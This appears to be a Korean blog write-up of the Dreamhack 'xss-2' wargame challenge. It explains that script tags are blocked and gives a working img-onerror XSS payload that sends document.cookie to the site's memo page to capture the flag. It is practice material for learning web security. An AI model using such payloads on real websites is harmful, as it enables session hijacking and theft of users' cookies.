728x90
링크 : https://dreamhack.io/wargame/challenges/268
xss-2
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. 플래그 형식은 DH{...} 입니다. 문제 수정 내역
dreamhack.io
문제 설명
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.
XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다.
플래그 형식은 DH{...} 입니다.
문제 풀이
1. xss-1과 달리 param=<script>alert(1)</script>가 실행되지 않는다.
2.vuln?param=<img%20src="1">을 입력한 결과 이미지가 삽입됨을 확인할 수 있다.ㅌ
3. 이미지를 로드할 수 없기 때문에 onerror 속성 안에 있는 자바스크립트 코드가 실행
<img src="x" onerror="location.href='/memo?memo='+document.cookie">
728x90
'CTF' 카테고리의 다른 글
[드림핵_웹해킹]csrf-1 (0) | 2024.09.29 |
---|---|
[드림핵_웹해킹]xss-1 (1) | 2024.09.29 |
[드림핵_웹해킹]session-basic (2) | 2024.09.29 |
[드림핵_웹해킹]cookie (1) | 2024.09.29 |
[드림핵_웹 해킹]devtools-sources (0) | 2024.09.29 |